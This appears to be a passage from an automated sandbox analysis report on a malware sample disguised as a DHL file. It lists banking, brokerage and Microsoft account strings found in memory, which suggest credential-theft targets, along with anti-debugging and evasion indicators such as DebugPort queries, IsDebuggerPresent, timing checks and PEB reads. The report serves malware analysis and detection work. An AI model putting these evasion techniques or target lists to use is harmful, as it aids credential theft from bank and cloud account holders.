            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: firefox.exe, 00000007.00000002.2514990770.0000021DA13AB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
            Source: F56GKLK7U4.4.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: F56GKLK7U4.4.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ivebrokers.comVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: F56GKLK7U4.4.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: F56GKLK7U4.4.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: F56GKLK7U4.4.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: F56GKLK7U4.4.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: F56GKLK7U4.4.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rd.comVMware20,11696428655f
            Source: F56GKLK7U4.4.dr | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: F56GKLK7U4.4.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ebrokers.co.inVMware20,11696428655d
            Source: F56GKLK7U4.4.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,116g
            Source: F56GKLK7U4.4.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: F56GKLK7U4.4.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: F56GKLK7U4.4.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: MPhqOtiHUlL.exe, 00000006.00000002.4523808032.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
            Source: netbtugc.exe, 00000004.00000002.4527634249.0000000007FC9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,116964286u!c
            Source: F56GKLK7U4.4.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: F56GKLK7U4.4.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: F56GKLK7U4.4.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417823 LdrLoadDll, 2_2_00417823
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_0089EAA2 BlockInput, 0_2_0089EAA2
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00852622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00852622
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_008242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_008242DE
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00844CE8 mov eax, dword ptr fs:[00000030h] 0_2_00844CE8
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00B65180 mov eax, dword ptr fs:[00000030h] 0_2_00B65180
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00B65120 mov eax, dword ptr fs:[00000030h] 0_2_00B65120
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00B63B00 mov eax, dword ptr fs:[00000030h] 0_2_00B63B00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928397 mov eax, dword ptr fs:[00000030h] 2_2_03928397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392E388 mov eax, dword ptr fs:[00000030h] 2_2_0392E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395438F mov eax, dword ptr fs:[00000030h] 2_2_0395438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov eax, dword ptr fs:[00000030h] 2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_039DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D43D4 mov eax, dword ptr fs:[00000030h] 2_2_039D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EC3CD mov eax, dword ptr fs:[00000030h] 2_2_039EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0393A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039383C0 mov eax, dword ptr fs:[00000030h] 2_2_039383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B63C0 mov eax, dword ptr fs:[00000030h] 2_2_039B63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039663FF mov eax, dword ptr fs:[00000030h] 2_2_039663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039403E9 mov eax, dword ptr fs:[00000030h] 2_2_039403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392C310 mov ecx, dword ptr fs:[00000030h] 2_2_0392C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h] 2_2_03950310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h] 2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov eax, dword ptr fs:[00000030h] 2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h] 2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h] 2_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h] 2_2_039D8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h] 2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D437C mov eax, dword ptr fs:[00000030h] 2_2_039D437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h] 2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h] 2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h] 2_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h] 2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h] 2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392823B mov eax, dword ptr fs:[00000030h] 2_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h] 2_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936259 mov eax, dword ptr fs:[00000030h] 2_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h] 2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h] 2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h] 2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h] 2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392826B mov eax, dword ptr fs:[00000030h] 2_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
